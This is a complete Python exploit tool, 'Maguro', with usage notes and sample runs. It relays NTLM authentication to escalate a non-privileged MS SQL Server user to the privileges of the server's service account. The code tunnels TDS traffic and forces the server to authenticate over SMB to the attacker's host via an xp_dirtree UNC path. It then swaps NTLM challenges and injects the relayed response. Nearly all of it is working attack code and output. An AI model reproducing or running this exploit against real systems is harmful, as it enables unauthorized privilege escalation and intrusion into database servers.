"""
###      MAGURO - NTLMSSP puppeteer         ###
### MS SQL server remote privilege agitator ###
###           ARGENISS 2006                 ###


~ brief and ugly explanation:

This tool tunels an TDS/SQL connection to a target SQL server for a non 
privileged user. The tunel juggles with the NTLMSSP packets contained in the 
TDS/SQL connection, and using the already well known and documented MITM attack
to NTLM authentication which existed for several years, escalates privileges 
to the ones of the account the SQL server is running as. To do so, it forces 
the target SQL server to connect and authenticate itself to the attacker's
machine.

~ tested on:
		. windows 2000 sp4 + sql server 2000

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$$$ how this looks from the SQL client point of view

>cli.py w2ks-sql2000
[.] connecting to server w2ks-sql2000...
[!] connected to server w2ks-sql2000 OK
Traceback (most recent call last):
  File "C:\tmp\cli.py", line 55, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]CREATE TABLE p
ermission denied in database 'master'. in EXEC

hu, notice PERMISSION DENIED

>cli.py w2ks-sql2000-tunel
[.] connecting to server w2ks-sql2000-tunel...
[!] connected to server w2ks-sql2000-tunel OK
Traceback (most recent call last):
  File "C:\tmp\cli.py", line 55, in ?
    print cursor.execute("create table katakuris (line varchar(42))")
dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]There is alrea
dy an object named 'katakuris' in the database. in EXEC

\o/ notice now it worked!



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$$$ sample output

###      MAGURO - NTLMSSP puppeteer         ###
### MS SQL server remote privilege agitator ###
###           ARGENISS 2006                 ###


[---] waiting for SQL client connection

[***] got evil SQL client

[***] got SQL server CHALLENGE

[---] challenging SQL server SMB client with the SQL server challenge
        [-] getting SMB connection from SQL server (DSN=w2ks-sql2000)

[***] got SQL server SMB client RESPONSE

[***] authenticating to SQL server as user A d m i n i s t r a t o r

[---] sending response to SQL server

[---] tunneling evil client...


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$$$ sample fully verbose output

>maguro.py 192.168.60.131

###      MAGURO - NTLMSSP puppeteer         ###
### MS SQL server remote privilege agitator ###
###           ARGENISS 2006                 ###

usage: maguro.py tunel_local_ip sql_server_ip sql_server


>maguro.py 192.168.60.1 192.168.60.131 w2ks-sql2000


###      MAGURO - NTLMSSP puppeteer         ###
### MS SQL server remote privilege agitator ###
###           ARGENISS 2006                 ###


[---] waiting for SQL client connection
        [-] new TDS client 127.0.0.1
        [-] connected to remote SQL server 192.168.60.131

[***] got evil SQL client

        ========================================
        [1->] SQL client -> TDS tunel
        [2->] SQL client -> TDS tunel -> SQL server

        ========================================
        [3<-] TDS tunel <- SQL server
        [4<-] SQL client <- TDS tunel <- SQL server

        ========================================
        [1->] SQL client -> TDS tunel
        [2->] SQL client -> TDS tunel -> SQL server

        ========================================
        [3<-] TDS tunel <- SQL server
        !! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
        [4<-] SQL client <- TDS tunel <- SQL server

[***] got SQL server CHALLENGE

[---] challenging SQL server SMB client with the SQL server challenge
        [-] SMBTuna, waiting for SQL server to connect to SMB tunel...
        [-] getting SMB connection from SQL server (DSN=w2ks-sql2000)
        [-] SMBTuna, SQL server 192.168.60.131 connected to SMB
        [-] SMBTuna, connected to remote SMB server 192.168.60.131

        ========================================
        [a->] SMB client -> SMB tunel
        [b->] SMB client -> SMB tunel -> SMB server

        ========================================
        [c<-] SMB tunel <- SMB server
        [d<-] SMB client <- SMB tunel <- SMB server

        ========================================
        [a->] SMB client -> SMB tunel
        !! NTLMSSP: STARTED NEGOTIATING !!
        [b->] SMB client -> SMB tunel -> SMB server

        ========================================
        [c<-] SMB tunel <- SMB server
        !! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
2f 31 e1 ca 9d ab 88 db
----------------------------------------
----------------------------------------
[SMB server challenge - 8 bytes]
2f 31 e1 ca 9d ab 88 db
----------------------------------------
        [-] SMBTuna, modifying challenge with SQL server challenge:
----------------------------------------
[SQL server challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
        [d<-] SMB client <- SMB tunel <- SMB server

        ========================================
        [a->] SMB client -> SMB tunel
        !! NTLMSSP: GOT AUTH !!
        [b->] SMB client -> SMB tunel -> SMB server

        ========================================
        [c<-] SMB tunel <- SMB server
        [d<-] SMB client <- SMB tunel <- SMB server

        ========================================
        [a->] SMB client -> SMB tunel
        [b->] SMB client -> SMB tunel -> SMB server

        ========================================
        [c<-] SMB tunel <- SMB server
        [d<-] SMB client <- SMB tunel <- SMB server

        ========================================
        [a->] SMB client -> SMB tunel
        !! NTLMSSP: STARTED NEGOTIATING !!
        [b->] SMB client -> SMB tunel -> SMB server

        ========================================
        [c<-] SMB tunel <- SMB server
        !! NTLMSSP: GOT CHALLENGE !!
----------------------------------------
[challenge - 8 bytes]
f0 7b 2e bb 18 e0 f9 82
----------------------------------------
----------------------------------------
[SMB server challenge - 8 bytes]
f0 7b 2e bb 18 e0 f9 82
----------------------------------------
        [-] SMBTuna, modifying challenge with SQL server challenge:
----------------------------------------
[SQL server challenge - 8 bytes]
0b 62 83 ca a8 36 71 f4
----------------------------------------
        [d<-] SMB client <- SMB tunel <- SMB server

        ========================================
        [a->] SMB client -> SMB tunel
        !! NTLMSSP: GOT AUTH !!
        [-] SMBTuna, got SQL server response to challenge
----------------------------------------------------------------------------

** NTLMSSP:type=3
----------------------------------------
[lmresponse - 24 bytes]
2a fe 49 f5 e7 09 92 4d 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
----------------------------------------
----------------------------------------
[ntlmresponse - 24 bytes]
05 e3 ce 38 88 45 c5 bb 44 6b c4 b9 ee d8 b3 06 f9 5b c1 0d
21 43 bd 14
----------------------------------------
- domain W 2 K S E R V E R
- user m a g u r o
- host W 2 K S E R V E R
----------------------------------------
[sessionKey - 16 bytes]
11 76 b7 fc 56 11 bd bd 9f 95 a2 25 fb 9c f1 ca
----------------------------------------
----------------------------------------------------------------------------


[***] got SQL server SMB client RESPONSE

[***] authenticating to SQL server as user m a g u r o

[---] sending response to SQL server

        ========================================
        [1->] SQL client -> TDS tunel
        [-] client TDS paquet: type 17 status 1 size 142/8e
        !! NTLMSSP: GOT AUTH !!
        [-] data NTLMSSP len is 134
        [-] new NTLMSSP len is 249
        [-] changing TDS size to 257/0x101
        [-] original data len -> 142
        [-] updated data len -> 257
        [2->] SQL client -> TDS tunel -> SQL server

        ========================================
        [3<-] TDS tunel <- SQL server
        [4<-] SQL client <- TDS tunel <- SQL server

[---] tunneling evil client...
        [-] TDSTuna, tunneling master requests...

        ========================================
        [1->] SQL client -> TDS tunel
        [2->] SQL client -> TDS tunel -> SQL server

        ========================================
        [3<-] TDS tunel <- SQL server
        [4<-] SQL client <- TDS tunel <- SQL server

        ========================================
        [1->] SQL client -> TDS tunel
        [2->] SQL client -> TDS tunel -> SQL server
"""

import socket
import struct
import array
import sys
import time
from threading import Thread
import dbi
import odbc


class get_smb_connection_worker(Thread):
	def __init__ (self,dsn,myip):
		Thread.__init__(self)
		self.dsn = 'DSN=%s' % dsn
		self.ip = myip

	def run(self):
		print '\t[-] getting SMB connection from SQL server (%s)' % self.dsn
		conn = odbc.odbc(self.dsn)
		cursor = conn.cursor()
		#sql = "exec master.dbo.xp_fileexist '\\\\%s\\anzuelo\\radu'" % self.ip
		sql = "exec master.dbo.xp_dirtree '\\\\%s\\anzuelo\\radu'" % self.ip
		cursor.execute(sql)


class NTLMSSP:

	NTLMSSP_NEGOTIATE 	= 	1
	NTLMSSP_CHALLENGE 	= 	2
	NTLMSSP_AUTH		=	3
		
	def __init__(self, p):

		self.verbose = 1

		self.challenge = None
		self.type = None
		self.flags = None

		# look for ntlmssp tag
		i = p.find('NTLMSSP\x00')
		if i == -1:
			self.p = None
			return
		else:
			self.p = p[i:]
			
		if len(self.p) < 4:
			print '[x] NTLMSSP got invalid/unknown packet - len < 4'
			self.p = None
			return

		self.type = struct.unpack('<L',self.p[8:12])[0]
		self.flags = struct.unpack('<L',self.p[12:16])[0]

		if self.type == NTLMSSP.NTLMSSP_CHALLENGE:
			self.challenge = self.p[24:24+8]
			if self.verbose:
				print '\t!! NTLMSSP: GOT CHALLENGE !!'
				hexdump(self.challenge,'challenge')
			
		elif self.type == NTLMSSP.NTLMSSP_AUTH:
			if self.verbose:
				print '\t!! NTLMSSP: GOT AUTH !!'

			self.lmresponse = get_bstr(self.p,self.p[12:])
			self.ntlmresponse = get_bstr(self.p,self.p[20:])
			self.domain = get_bstr(self.p,self.p[28:])
			self.user = get_bstr(self.p,self.p[36:])
			self.host = get_bstr(self.p,self.p[44:])
			self.sessionKey = get_bstr(self.p,self.p[52:])
			
		elif self.type == NTLMSSP.NTLMSSP_NEGOTIATE:
			if self.verbose:
				print '\t!! NTLMSSP: STARTED NEGOTIATING !!'
		else:
			print '[?] unknown NTLMSSP message type'


	def dump(self):
		print '--------------------------------------------------------------------------------'
		print '** NTLMSSP:type=%d' % self.type
		hexdump(self.lmresponse,'lmresponse')
		hexdump(self.ntlmresponse,'ntlmresponse')
		print '- domain %s' % str(self.domain)
		print '- user %s' % str(self.user)
		print '- host %s' % str(self.host)
		hexdump(self.sessionKey,'sessionKey')
		print '--------------------------------------------------------------------------------'

	def dump_flags(self):
		if self.flags != None:
			print 'NTLMSSP flags:'
			if self.flags & 1:
				print '   UNICODE'
			if self.flags & 2:
				print '   OEM'
			if self.flags & 4:
				print '   Request Target'
			if self.flags & 8:
				print '   Bit 8'
			if self.flags & 16:
				print '   Sign'
			if self.flags & 32:
				print '   Seal'
			if self.flags & 64:
				print '   Datagram Style'
			if self.flags & 128:
				print '   Lan Manager Key'
			if self.flags & 256:
				print '   Netware'
			if self.flags & 512:
				print '   NTLM Key'
			if self.flags & 1024:
				print '   Bit 1024'
			if self.flags & 2048:
				print '   Bit 2048'
			if self.flags & 4096:
				print '   Domain Supplied'
			if self.flags & 8192:
				print '   Workstation Supplied'
			if self.flags & 16384:
				print '   Local Call'
			if self.flags & 32768:
				print '   Always Sign'
			if self.flags & 655356:
				print '   Challenge Init Response'
			if self.flags & 131072:
				print '   Challenge Accept Response'
			if self.flags & 262144:
				print '   Non NT Session Key'
			if self.flags & 524288:
				print '   NTLM2 Key'
			if self.flags & 1048576:
				print '   Bit 0x00100000'
			# TODO: dump remaining flags

	def get_len(self):
		return len(self.p)

	def get_challenge(self):
		return self.challenge

	def got_challenge(self):
		if self.challenge != None:
			return 1
		else:
			return 0

	def get_domain(self):
		return self.domain

	def get_user(self):
		return self.user

	def get_host(self):
		return self.host

	def get_flags(self):
		return self.flags

	def is_negotiate(self):
		if self.type == NTLMSSP.NTLMSSP_NEGOTIATE:
			return 1
		else:
			return 0

	def is_response(self):
		if self.type == NTLMSSP.NTLMSSP_AUTH:
			if len(self.ntlmresponse) == 24 and len(self.lmresponse) == 24:
				return 1
			else:
				return 0
		else:
			return 0


def get_bstr(p,tok):
	l = int(struct.unpack('<H',tok[0:2])[0])
	off = int(struct.unpack('<L',tok[4:8])[0])
	str = p[off:off+l]
	return str


def hexdump(data,title=None):
	print '----------------------------------------'
	if title != None:
		print '[%s - %d bytes]' % (title,len(data))
	else:
		print '[%d bytes]' % len(data)
	i = 0
	str = ''
	for x in data:
		str = str + '%02x ' % struct.unpack('B',x)
		i = i + 1
		if i == 20:
			print str
			i = 0
			str = ''
	if str != '':
			print str
	print '----------------------------------------'


# TDS tunnel
class TDSTuna:
	def __init__(self, server_ip, port=1433):
		self.verbose = 1
		host = ''
		backlog = 10
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.bind((host,port))
			s.listen(backlog)
			# wait for TDS client
			self.client, address = s.accept()
			if self.verbose:
				print '\t[-] new TDS client %s' % address[0]
			# connect to SQL server
			self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			self.server.connect((server_ip,1433))
			if self.verbose:
				print '\t[-] connected to remote SQL server %s' % server_ip
		except Exception,e:
			print '[x] TDSTuna, __init__ failed'
			print e
			sys.exit(-1)
		self.recvLen = 1024 * 4
		self.challenge = None
		self.response = None

	def get_challenge(self):
		while 1:
			try:
				# 1) read client request
				data = self.client.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[1->] SQL client -> TDS tunel'
				# 2) tunel client request to server
				self.server.send(data)
				if self.verbose:
					print '\t[2->] SQL client -> TDS tunel -> SQL server'
				# 3) read and parse server response
				data = self.server.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[3<-] TDS tunel <- SQL server'
				ntlmssp = NTLMSSP(data)
				# 4) tunel server response to client
				self.client.send(data)
				if self.verbose:
					print '\t[4<-] SQL client <- TDS tunel <- SQL server'
			except Exception,e:
				print '[x] get_challenge, failed'
				print e
				sys.exit(-1)
			if ntlmssp.got_challenge():
				return ntlmssp.get_challenge()

	def send_response_copy_blob(self, ntlm):
		try:
			# 1) read and parse client request
			data = self.client.recv(self.recvLen)
			if self.verbose:
				print '\n\t========================================'
				print '\t[1->] SQL client -> TDS tunel'
			
			tdstype = struct.unpack('B',data[0:1])[0]
			tdsstatus = struct.unpack('B',data[1:2])[0]
			tdssize = struct.unpack('>H',data[2:4])[0]
			if self.verbose:
				print '\t[-] client TDS paquet: type %d status %d size %d/%x' % (tdstype,tdsstatus,tdssize,tdssize)
			
			ntlmssp = NTLMSSP(data)

			# modify response packet
			tdssize = tdssize + ntlm.get_len() - ntlmssp.get_len()
			if self.verbose:
				print '\t[-] data NTLMSSP len is %d' % ntlmssp.get_len()
				print '\t[-] new NTLMSSP len is %d' % ntlm.get_len()
				print '\t[-] changing TDS size to %d/0x%x' % (tdssize,tdssize)

	
			ntlmssp = ntlm
			
			# look for ntlmssp tag
			i = data.find('NTLMSSP\x00')
			if i == -1:
				print '[x] TDSTuna, send_response_copy_blob expected NTLMSSP packet inside data'
				sys.exit(-1)
				
			if self.verbose:
				print '\t[-] original data len -> %d' % len(data)

			da = array.array('B',data)
			da[3] = tdssize & 0xff
			da[2] = tdssize >> 8 & 0xff
			da[i:] = array.array('B',ntlmssp.p)
			data = da.tostring()

			if self.verbose:
				print '\t[-] updated data len -> %d' % len(data)
			# end of modify response packet


			
			# 2) tunel client request to server
			self.server.send(data)
			if self.verbose:
				print '\t[2->] SQL client -> TDS tunel -> SQL server'
			# 3) read server response
			data = self.server.recv(self.recvLen)
			if self.verbose:
				print '\n\t========================================'
				print '\t[3<-] TDS tunel <- SQL server'
			# 4) tunel server response to client
			self.client.send(data)
			if self.verbose:
				print '\t[4<-] SQL client <- TDS tunel <- SQL server'
		except Exception,e:
			print '[x] send_response, failed'
			print e
			sys.exit(-1)


	def tunel(self):
		if self.verbose:
			print '\t[-] TDSTuna, tunneling master requests...'
		while 1:
			try:
				# 1) read client request
				data = self.client.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[1->] SQL client -> TDS tunel'
				# 2) tunel client request to server
				self.server.send(data)
				if self.verbose:
					print '\t[2->] SQL client -> TDS tunel -> SQL server'
				# 3) read server response
				data = self.server.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[3<-] TDS tunel <- SQL server'
				# 4) tunel server response to client
				self.client.send(data)
				if self.verbose:
					print '\t[4<-] SQL client <- TDS tunel <- SQL server'
			except Exception,e:
				print '[x] TDSTuna.tunel, failed'
				print e
				sys.exit(-1)



# SMB tunnel
class SMBTuna:
	def __init__(self):
		self.verbose = 1
		host = ''
		self.port = 445
		backlog = 10
		self.recvLen = 1024 * 4
		self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.s.bind((host,self.port))
		self.s.listen(backlog)

	def get_response(self, local_ip, server_dsn, challenge):
		if self.verbose:
			print '\t[-] SMBTuna, waiting for SQL server to connect to SMB tunel...'
		w = get_smb_connection_worker(server_dsn,local_ip)
		w.start()

		try:
			# wait for a client
			client, address = self.s.accept()
			if self.verbose:
				print '\t[-] SMBTuna, SQL server %s connected to SMB' % address[0]
			# connect to client server
			server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			server.connect((address[0],self.port))
			if self.verbose:
				print '\t[-] SMBTuna, connected to remote SMB server %s' % address[0]
		except Exception,e:
			print '[x] get_response failed'
			print e
			sys.exit(-1)


		while 1:
			try:
				# read and parse client request
				data = client.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[a->] SMB client -> SMB tunel'
				
				ntlmssp = NTLMSSP(data)
				# if we are starting the NEGOTIATION, clean flags
				# we need to do this cause if the SMB client (@ SQL server) sends the domain and workstation
				# when we reflect them, the SMB server (@ SQL server too!) sets the 'is local call' flag
				if ntlmssp.is_negotiate():
					smb_flags = ntlmssp.get_flags()
					#ntlmssp.dump_flags()
					clean_flags = smb_flags
					clean_flags &= ~4096 # Domain Supplied
					clean_flags &= ~8192 # Workstation Supplied
					data = data.replace(struct.pack("L",smb_flags),struct.pack("L",clean_flags))
				
				# if we got our response, close connections and end loop
				if ntlmssp.is_response():
					if self.verbose:
						print '\t[-] SMBTuna, got SQL server response to challenge'
						ntlmssp.dump()
					#client.close()
					#server.close()
					return ntlmssp
				
				# tunel client request to server
				server.send(data)
				if self.verbose:
					print '\t[b->] SMB client -> SMB tunel -> SMB server'

				# read and parse server answer
				data = server.recv(self.recvLen)
				if self.verbose:
					print '\n\t========================================'
					print '\t[c<-] SMB tunel <- SMB server'
				
				ntlmssp = NTLMSSP(data)
				# if we got a challenge, replace it with the SQL server challenge
				if ntlmssp.got_challenge():
					smb_challenge = ntlmssp.get_challenge()
					if self.verbose:
						hexdump(smb_challenge,'SMB server challenge')
					if challenge != None:
						if self.verbose:
							print '\t[-] SMBTuna, modifying challenge with SQL server challenge:'
							hexdump(challenge,'SQL server challenge')
						data = data.replace(smb_challenge,challenge)

				# send modified server response to client
				client.send(data)
				if self.verbose:
					print '\t[d<-] SMB client <- SMB tunel <- SMB server'
			except Exception,e:
				print '[x] get_response failed'
				print e
				sys.exit(-1)







print 
print '###      MAGURO - NTLMSSP puppeteer         ###'
print '### MS SQL server remote privilege agitator ###'
print '###           ARGENISS 2006                 ###'
print 

if len(sys.argv) != 4:
	print 'usage: %s tunel_local_ip sql_server_ip sql_server_dsn' % sys.argv[0]
	print
	sys.exit(-1)

server_ip = sys.argv[2]
server_dsn = sys.argv[3]
local_ip = sys.argv[1]

# get CHALLENGE from SQL server
print '\n[---] waiting for SQL client connection'
TDS = TDSTuna(server_ip)
print '\n[***] got evil SQL client'
challenge = TDS.get_challenge()
print '\n[***] got SQL server CHALLENGE'

# get SQL server response for this challenge
print '\n[---] challenging SQL server SMB client with the SQL server challenge'
ntlm = SMBTuna().get_response(local_ip,server_dsn,challenge)
print '\n[***] got SQL server SMB client RESPONSE'
print '\n[***] authenticating to SQL server as user %s' % ntlm.get_user()

# send RESPONSE to SQL server
print '\n[---] sending response to SQL server'
TDS.send_response_copy_blob(ntlm)

# continue tunneling TDS so the evil client is happy
print '\n[---] tunneling evil client...'
TDS.tunel()
